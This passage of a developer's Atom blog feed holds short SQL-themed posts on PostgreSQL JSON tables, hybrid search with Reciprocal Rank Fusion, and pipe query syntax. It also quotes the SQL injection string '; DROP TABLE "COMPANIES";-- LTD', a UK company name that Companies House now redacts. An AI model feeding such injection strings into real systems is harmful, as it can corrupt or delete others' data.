    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43761998"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webassembly"&gt;webassembly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="webassembly"/><category term="duckdb"/></entry><entry><title>[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]</title><link href="https://simonwillison.net/2025/Apr/9/name-available-on-request/#atom-tag" rel="alternate"/><published>2025-04-09T16:52:04+00:00</published><updated>2025-04-09T16:52:04+00:00</updated><id>https://simonwillison.net/2025/Apr/9/name-available-on-request/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://find-and-update.company-information.service.gov.uk/company/10542519"&gt;[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I just noticed that the legendary company name &lt;code&gt;; DROP TABLE "COMPANIES";-- LTD&lt;/code&gt; is now listed as &lt;code&gt;[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]&lt;/code&gt; on the UK government Companies House website.&lt;/p&gt;
&lt;p&gt;For background, see &lt;a href="https://pizzey.me/posts/no-i-didnt-try-to-break-companies-house/"&gt;No, I didn't try to break Companies House&lt;/a&gt; by culprit Sam Pizzey.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql-injection"&gt;sql-injection&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="sql-injection"/></entry><entry><title>I Went To SQL Injection Court</title><link href="https://simonwillison.net/2025/Feb/25/i-went-to-sql-injection-court/#atom-tag" rel="alternate"/><published>2025-02-25T22:45:57+00:00</published><updated>2025-02-25T22:45:57+00:00</updated><id>https://simonwillison.net/2025/Feb/25/i-went-to-sql-injection-court/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2025/02/09/fixing-illinois-foia/"&gt;I Went To SQL Injection Court&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek talks about his ongoing involvement as an expert witness in an Illinois legal battle led by Matt Chapman over whether a SQL schema (e.g. for the CANVAS parking ticket database) should be accessible to Freedom of Information (FOIA) requests against the Illinois state government.&lt;/p&gt;
&lt;p&gt;They eventually lost in the Illinois Supreme Court, but there's still hope in the shape of &lt;a href="https://legiscan.com/IL/bill/SB0226/2025"&gt;IL SB0226&lt;/a&gt;, a proposed bill that would amend the FOIA act to ensure "that the public body shall provide a sufficient description of the structures of all databases under the control of the public body to allow a requester to request the public body to perform specific database queries".&lt;/p&gt;
&lt;p&gt;Thomas &lt;a href="https://news.ycombinator.com/item?id=43175628#43175758"&gt;posted this comment&lt;/a&gt; on Hacker News:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Permit me a PSA about local politics: engaging in national politics is bleak and dispiriting, like being a gnat bouncing off the glass plate window of a skyscraper. Local politics is, by contrast, extremely responsive. I've gotten things done --- including a law passed --- in my spare time and at practically no expense (&lt;em&gt;drastically&lt;/em&gt; unlike national politics).&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43175628"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/data-journalism"&gt;data-journalism&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/government"&gt;government&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/law"&gt;law&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/politics"&gt;politics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql-injection"&gt;sql-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;&lt;/p&gt;



</summary><category term="data-journalism"/><category term="databases"/><category term="government"/><category term="law"/><category term="politics"/><category term="sql"/><category term="sql-injection"/><category term="thomas-ptacek"/></entry><entry><title>Dashboard: Tools</title><link href="https://simonwillison.net/2024/Oct/21/dashboard-tools/#atom-tag" rel="alternate"/><published>2024-10-21T03:33:41+00:00</published><updated>2024-10-21T03:33:41+00:00</updated><id>https://simonwillison.net/2024/Oct/21/dashboard-tools/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://simonwillison.net/dashboard/tools/"&gt;Dashboard: Tools&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I used &lt;a href="https://django-sql-dashboard.datasette.io/"&gt;Django SQL Dashboard&lt;/a&gt; to spin up a dashboard that shows all of the URLs to my &lt;a href="https://tools.simonwillison.net/"&gt;tools.simonwillison.net&lt;/a&gt; site that I've shared on my blog so far. It uses this (Claude assisted) regular expression in a PostgreSQL SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select distinct&lt;/span&gt; &lt;span class="pl-k"&gt;on&lt;/span&gt; (tool_url)
    unnest(regexp_matches(
        body,
        &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;(https://tools&lt;span class="pl-cce"&gt;\.&lt;/span&gt;simonwillison&lt;span class="pl-cce"&gt;\.&lt;/span&gt;net/[^&amp;lt;"&lt;span class="pl-cce"&gt;\s&lt;/span&gt;)]+)&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;,
        &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;g&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
    )) &lt;span class="pl-k"&gt;as&lt;/span&gt; tool_url,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;https://simonwillison.net/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; left(type, &lt;span class="pl-c1"&gt;1&lt;/span&gt;) &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; id &lt;span class="pl-k"&gt;as&lt;/span&gt; blog_url,
    title,
    &lt;span class="pl-k"&gt;date&lt;/span&gt;(created) &lt;span class="pl-k"&gt;as&lt;/span&gt; created
&lt;span class="pl-k"&gt;from&lt;/span&gt; content&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;I've been really enjoying having a static hosting platform (it's GitHub Pages serving my &lt;a href="https://github.com/simonw/tools"&gt;simonw/tools&lt;/a&gt; repo) that I can use to quickly deploy little HTML+JavaScript interactive tools and demos.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;&lt;/p&gt;



</summary><category term="javascript"/><category term="postgresql"/><category term="projects"/><category term="sql"/><category term="tools"/><category term="django-sql-dashboard"/><category term="ai-assisted-programming"/></entry><entry><title>PostgreSQL 17: SQL/JSON is here!</title><link href="https://simonwillison.net/2024/Oct/13/postgresql-sqljson/#atom-tag" rel="alternate"/><published>2024-10-13T19:01:02+00:00</published><updated>2024-10-13T19:01:02+00:00</updated><id>https://simonwillison.net/2024/Oct/13/postgresql-sqljson/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.depesz.com/2024/10/11/sql-json-is-here-kinda-waiting-for-pg-17/"&gt;PostgreSQL 17: SQL/JSON is here!&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Hubert Lubaczewski dives into the new JSON features added in PostgreSQL 17, released a few weeks ago on the &lt;a href="https://www.postgresql.org/about/news/postgresql-17-released-2936/"&gt;26th of September&lt;/a&gt;. This is the latest in his &lt;a href="https://www.depesz.com/tag/waiting/"&gt;long series&lt;/a&gt; of similar posts about new PostgreSQL features.&lt;/p&gt;
&lt;p&gt;The features are based on the new &lt;a href="https://en.wikipedia.org/wiki/SQL:2023"&gt;SQL:2023&lt;/a&gt; standard from June 2023. If you want to actually &lt;em&gt;read&lt;/em&gt; the specification for SQL:2023 it looks like you have to &lt;a href="https://www.iso.org/standard/76583.html"&gt;buy a PDF from ISO&lt;/a&gt; for 194 Swiss Francs (currently $226). Here's a handy summary by Peter Eisentraut: &lt;a href="http://peter.eisentraut.org/blog/2023/04/04/sql-2023-is-finished-here-is-whats-new"&gt;SQL:2023 is finished: Here is what's new&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There's a lot of neat stuff in here. I'm particularly interested in the &lt;code&gt;json_table()&lt;/code&gt; table-valued function, which can convert a JSON string into a table with quite a lot of flexibility. You can even specify a full table schema as part of the function call:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;FROM&lt;/span&gt; json_table(
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;[{"a":10,"b":20},{"a":30,"b":40}]&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;::jsonb,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;$[*]&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
    COLUMNS (
        id FOR ORDINALITY,
        column_a int4 &lt;span class="pl-k"&gt;path&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;$.a&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;,
        column_b int4 &lt;span class="pl-k"&gt;path&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;$.b&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;,
        a int4,
        b int4,
        c &lt;span class="pl-k"&gt;text&lt;/span&gt;
    )
);&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;SQLite has &lt;a href="https://www.sqlite.org/json1.html"&gt;solid JSON support already&lt;/a&gt; and often imitates PostgreSQL features, so I wonder if we'll see an update to SQLite that reflects some aspects of this new syntax.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/spw1je/sql_json_is_here_kinda_waiting_for_pg_17"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="json"/><category term="postgresql"/><category term="sql"/><category term="sqlite"/></entry><entry><title>Hybrid full-text search and vector search with SQLite</title><link href="https://simonwillison.net/2024/Oct/4/hybrid-full-text-search-and-vector-search-with-sqlite/#atom-tag" rel="alternate"/><published>2024-10-04T16:22:09+00:00</published><updated>2024-10-04T16:22:09+00:00</updated><id>https://simonwillison.net/2024/Oct/4/hybrid-full-text-search-and-vector-search-with-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://alexgarcia.xyz/blog/2024/sqlite-vec-hybrid-search/index.html"&gt;Hybrid full-text search and vector search with SQLite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
As part of Alex’s work on his &lt;a href="https://github.com/asg017/sqlite-vec"&gt;sqlite-vec&lt;/a&gt; SQLite extension - adding fast vector lookups to SQLite - he’s been investigating hybrid search, where search results from both vector similarity and traditional full-text search are combined.&lt;/p&gt;
&lt;p&gt;The most promising approach looks to be &lt;a href="https://learn.microsoft.com/en-us/azure/search/hybrid-search-ranking"&gt;Reciprocal Rank Fusion&lt;/a&gt;, which combines the top ranked items from both approaches. Here’s Alex’s SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; the sqlite-vec KNN vector search results&lt;/span&gt;
with vec_matches &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    article_id,
    row_number() over (&lt;span class="pl-k"&gt;order by&lt;/span&gt; distance) &lt;span class="pl-k"&gt;as&lt;/span&gt; rank_number,
    distance
  &lt;span class="pl-k"&gt;from&lt;/span&gt; vec_articles
  &lt;span class="pl-k"&gt;where&lt;/span&gt;
    headline_embedding match lembed(:query)
    &lt;span class="pl-k"&gt;and&lt;/span&gt; k &lt;span class="pl-k"&gt;=&lt;/span&gt; :k
),
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; the FTS5 search results&lt;/span&gt;
fts_matches &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    rowid,
    row_number() over (&lt;span class="pl-k"&gt;order by&lt;/span&gt; rank) &lt;span class="pl-k"&gt;as&lt;/span&gt; rank_number,
    rank &lt;span class="pl-k"&gt;as&lt;/span&gt; score
  &lt;span class="pl-k"&gt;from&lt;/span&gt; fts_articles
  &lt;span class="pl-k"&gt;where&lt;/span&gt; headline match :query
  &lt;span class="pl-k"&gt;limit&lt;/span&gt; :k
),
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; combine FTS5 + vector search results with RRF&lt;/span&gt;
final &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    &lt;span class="pl-c1"&gt;articles&lt;/span&gt;.&lt;span class="pl-c1"&gt;id&lt;/span&gt;,
    &lt;span class="pl-c1"&gt;articles&lt;/span&gt;.&lt;span class="pl-c1"&gt;headline&lt;/span&gt;,
    &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; vec_rank,
    &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; fts_rank,
    &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; RRF algorithm&lt;/span&gt;
    (
      coalesce(&lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;/&lt;/span&gt; (:rrf_k &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt;), &lt;span class="pl-c1"&gt;0&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt;) &lt;span class="pl-k"&gt;*&lt;/span&gt; :weight_fts &lt;span class="pl-k"&gt;+&lt;/span&gt;
      coalesce(&lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;/&lt;/span&gt; (:rrf_k &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt;), &lt;span class="pl-c1"&gt;0&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt;) &lt;span class="pl-k"&gt;*&lt;/span&gt; :weight_vec
    ) &lt;span class="pl-k"&gt;as&lt;/span&gt; combined_rank,
    &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;distance&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; vec_distance,
    &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;score&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; fts_score
  &lt;span class="pl-k"&gt;from&lt;/span&gt; fts_matches
  full outer &lt;span class="pl-k"&gt;join&lt;/span&gt; vec_matches &lt;span class="pl-k"&gt;on&lt;/span&gt; &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;article_id&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rowid&lt;/span&gt;
  &lt;span class="pl-k"&gt;join&lt;/span&gt; articles &lt;span class="pl-k"&gt;on&lt;/span&gt; &lt;span class="pl-c1"&gt;articles&lt;/span&gt;.&lt;span class="pl-c1"&gt;rowid&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; coalesce(&lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rowid&lt;/span&gt;, &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;article_id&lt;/span&gt;)
  &lt;span class="pl-k"&gt;order by&lt;/span&gt; combined_rank &lt;span class="pl-k"&gt;desc&lt;/span&gt;
)
&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; final;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;I’ve been puzzled in the past over how to best do that because the distance scores from vector similarity and the relevance scores from FTS are meaningless in comparison to each other. RRF doesn’t even attempt to compare them - it uses them purely for &lt;code&gt;row_number()&lt;/code&gt; ranking within each set and combines the results based on that.
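&lt;p&gt;To make the idea concrete, here is a minimal Python sketch of the same scoring rule as the RRF expression in the query above. This is my own illustration, not Alex’s code: the &lt;code&gt;rrf_scores&lt;/code&gt; function, the default &lt;code&gt;rrf_k&lt;/code&gt; of 60 and the example ids are all assumptions.&lt;/p&gt;

```python
def rrf_scores(fts_ids, vec_ids, rrf_k=60, weight_fts=1.0, weight_vec=1.0):
    """Combine two ranked lists of ids using Reciprocal Rank Fusion.

    Each list is ordered best-first. Only positions are used, never the
    raw FTS relevance scores or vector distances.
    """
    scores = {}
    for weight, ids in ((weight_fts, fts_ids), (weight_vec, vec_ids)):
        for rank_number, item_id in enumerate(ids, start=1):
            # An id missing from one list simply contributes nothing for it
            scores[item_id] = scores.get(item_id, 0.0) + weight / (rrf_k + rank_number)
    # Highest combined score first
    return sorted(scores.items(), key=lambda pair: pair[1], reverse=True)


# Hypothetical ids: article 2 ranks well in both lists, so it comes out on top
combined = rrf_scores(fts_ids=[1, 2, 3], vec_ids=[2, 4, 1])
print([item_id for item_id, _ in combined])  # [2, 1, 4, 3]
```

&lt;p&gt;Raising &lt;code&gt;weight_fts&lt;/code&gt; or &lt;code&gt;weight_vec&lt;/code&gt; tilts the result towards one of the two searches, mirroring the &lt;code&gt;:weight_fts&lt;/code&gt; and &lt;code&gt;:weight_vec&lt;/code&gt; parameters in the SQL.&lt;/p&gt;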


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/full-text-search"&gt;full-text-search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/search"&gt;search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/alex-garcia"&gt;alex-garcia&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vector-search"&gt;vector-search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/embeddings"&gt;embeddings&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rag"&gt;rag&lt;/a&gt;&lt;/p&gt;



</summary><category term="full-text-search"/><category term="search"/><category term="sql"/><category term="sqlite"/><category term="alex-garcia"/><category term="vector-search"/><category term="embeddings"/><category term="rag"/></entry><entry><title>Quoting D. Richard Hipp</title><link href="https://simonwillison.net/2024/Aug/28/d-richard-hipp/#atom-tag" rel="alternate"/><published>2024-08-28T22:30:28+00:00</published><updated>2024-08-28T22:30:28+00:00</updated><id>https://simonwillison.net/2024/Aug/28/d-richard-hipp/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://sqlite.org/forum/forumpost/2d2720461b82f2fd"&gt;&lt;p&gt;My goal is to keep SQLite relevant and viable through the year 2050. That's a long time from now. If I knew that standard SQL was not going to change any between now and then, I'd go ahead and make non-standard extensions that allowed for FROM-clause-first queries, as that seems like a useful extension. The problem is that standard SQL will &lt;em&gt;not&lt;/em&gt; remain static. Probably some future version of "standard SQL" will support some kind of FROM-clause-first query format. I need to ensure that whatever SQLite supports will be compatible with the standard, whenever it drops. And the only way to do that is to support nothing until after the standard appears.&lt;/p&gt;
&lt;p&gt;When will that happen? A month? A year? Ten years? Who knows.&lt;/p&gt;
&lt;p&gt;I'll probably take my cue from PostgreSQL. If PostgreSQL adds support for FROM-clause-first queries, then I'll do the same with SQLite, copying the PostgreSQL syntax. Until then, I'm afraid you are stuck with only traditional SELECT-first queries in SQLite.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://sqlite.org/forum/forumpost/2d2720461b82f2fd"&gt;D. Richard Hipp&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/d-richard-hipp"&gt;d-richard-hipp&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="d-richard-hipp"/><category term="sql"/><category term="postgresql"/><category term="sqlite"/></entry><entry><title>SQL Has Problems. We Can Fix Them: Pipe Syntax In SQL</title><link href="https://simonwillison.net/2024/Aug/24/pipe-syntax-in-sql/#atom-tag" rel="alternate"/><published>2024-08-24T23:00:01+00:00</published><updated>2024-08-24T23:00:01+00:00</updated><id>https://simonwillison.net/2024/Aug/24/pipe-syntax-in-sql/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://research.google/pubs/sql-has-problems-we-can-fix-them-pipe-syntax-in-sql/"&gt;SQL Has Problems. We Can Fix Them: Pipe Syntax In SQL&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
A new paper from Google Research describing custom syntax for analytical SQL queries that has been rolling out inside Google since February, reaching 1,600 "seven-day-active users" by August 2024.&lt;/p&gt;
&lt;p&gt;A key idea here is to fix one of the biggest usability problems with standard SQL: the order of the clauses in a query. Starting with &lt;code&gt;SELECT&lt;/code&gt; instead of &lt;code&gt;FROM&lt;/code&gt; has always been confusing; see &lt;a href="https://jvns.ca/blog/2019/10/03/sql-queries-don-t-start-with-select/"&gt;SQL queries don't start with SELECT&lt;/a&gt; by Julia Evans.&lt;/p&gt;
&lt;p&gt;Here's an example of the new alternative syntax, taken from the &lt;a href="https://github.com/google/zetasql/blob/2024.08.2/docs/pipe-syntax.md"&gt;Pipe query syntax documentation&lt;/a&gt; that was added to Google's open source &lt;a href="https://github.com/google/zetasql"&gt;ZetaSQL&lt;/a&gt; project last week.&lt;/p&gt;
&lt;p&gt;For this SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt; component_id, &lt;span class="pl-c1"&gt;COUNT&lt;/span&gt;(&lt;span class="pl-k"&gt;*&lt;/span&gt;)
&lt;span class="pl-k"&gt;FROM&lt;/span&gt; ticketing_system_table
&lt;span class="pl-k"&gt;WHERE&lt;/span&gt;
  &lt;span class="pl-c1"&gt;assignee_user&lt;/span&gt;.&lt;span class="pl-c1"&gt;email&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;username@email.com&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
  &lt;span class="pl-k"&gt;AND&lt;/span&gt; status &lt;span class="pl-k"&gt;IN&lt;/span&gt; (&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;NEW&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;ASSIGNED&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;ACCEPTED&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;)
&lt;span class="pl-k"&gt;GROUP BY&lt;/span&gt; component_id
&lt;span class="pl-k"&gt;ORDER BY&lt;/span&gt; component_id &lt;span class="pl-k"&gt;DESC&lt;/span&gt;;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;The Pipe query alternative would look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FROM ticketing_system_table
|&amp;gt; WHERE
    assignee_user.email = 'username@email.com'
    AND status IN ('NEW', 'ASSIGNED', 'ACCEPTED')
|&amp;gt; AGGREGATE COUNT(*)
   GROUP AND ORDER BY component_id DESC;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The Google Research paper is released as a two-column PDF. I &lt;a href="https://news.ycombinator.com/item?id=41339138"&gt;snarked about this&lt;/a&gt; on Hacker News: &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Google: you are a web company. Please learn to publish your research papers as web pages.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This remains a long-standing pet peeve of mine. PDFs like this are horrible to read on mobile phones, hard to copy-and-paste from, have poor accessibility (see &lt;a href="https://fedi.simonwillison.net/@simon/113017908957136345"&gt;this Mastodon conversation&lt;/a&gt;) and are generally just &lt;em&gt;bad citizens&lt;/em&gt; of the web.&lt;/p&gt;
&lt;p&gt;Having complained about this I felt compelled to see if I could address it myself. Google's own Gemini Pro 1.5 model can process PDFs, so I uploaded the PDF to &lt;a href="https://aistudio.google.com/"&gt;Google AI Studio&lt;/a&gt; and prompted the &lt;code&gt;gemini-1.5-pro-exp-0801&lt;/code&gt; model like this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Convert this document to neatly styled semantic HTML&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This worked &lt;em&gt;surprisingly well&lt;/em&gt;. It output HTML for about half the document and then stopped, presumably hitting the output length limit, but a follow-up prompt of "and the rest" caused it to continue from where it stopped and run until the end.&lt;/p&gt;
&lt;p&gt;Here's the result (with a banner I added at the top explaining that it's a conversion): &lt;a href="https://static.simonwillison.net/static/2024/Pipe-Syntax-In-SQL.html"&gt;Pipe-Syntax-In-SQL.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I haven't compared the two completely, so I can't guarantee there are no omissions or mistakes.&lt;/p&gt;
&lt;p&gt;The figures from the PDF aren't present - Gemini Pro output tags like &lt;code&gt;&amp;lt;img src="figure1.png" alt="Figure 1: SQL syntactic clause order doesn't match semantic evaluation order. (From [25].)"&amp;gt;&lt;/code&gt; but did nothing to help me create those images.&lt;/p&gt;
&lt;p&gt;Amusingly the document ends with &lt;code&gt;&amp;lt;p&amp;gt;(A long list of references, which I won't reproduce here to save space.)&amp;lt;/p&amp;gt;&lt;/code&gt; rather than actually including the references from the paper!&lt;/p&gt;
&lt;p&gt;So this isn't a perfect solution, but considering it took just the first prompt I could think of it's a very promising start. I expect someone willing to spend more than the couple of minutes I invested in this could produce a very useful HTML alternative version of the paper with the assistance of Gemini Pro.&lt;/p&gt;
&lt;p&gt;One last amusing note: I posted a link to this &lt;a href="https://news.ycombinator.com/item?id=41339238"&gt;to Hacker News&lt;/a&gt; a few hours ago. Just now when I searched Google for the exact title of the paper my HTML version was already the third result!&lt;/p&gt;
&lt;p&gt;I've now added a &lt;code&gt;&amp;lt;meta name="robots" content="noindex, follow"&amp;gt;&lt;/code&gt; tag to the top of the HTML to keep this unverified &lt;a href="https://simonwillison.net/tags/slop/"&gt;AI slop&lt;/a&gt; out of their search index. This is a good reminder of how much better HTML is than PDF for sharing information on the web!&lt;/p&gt;

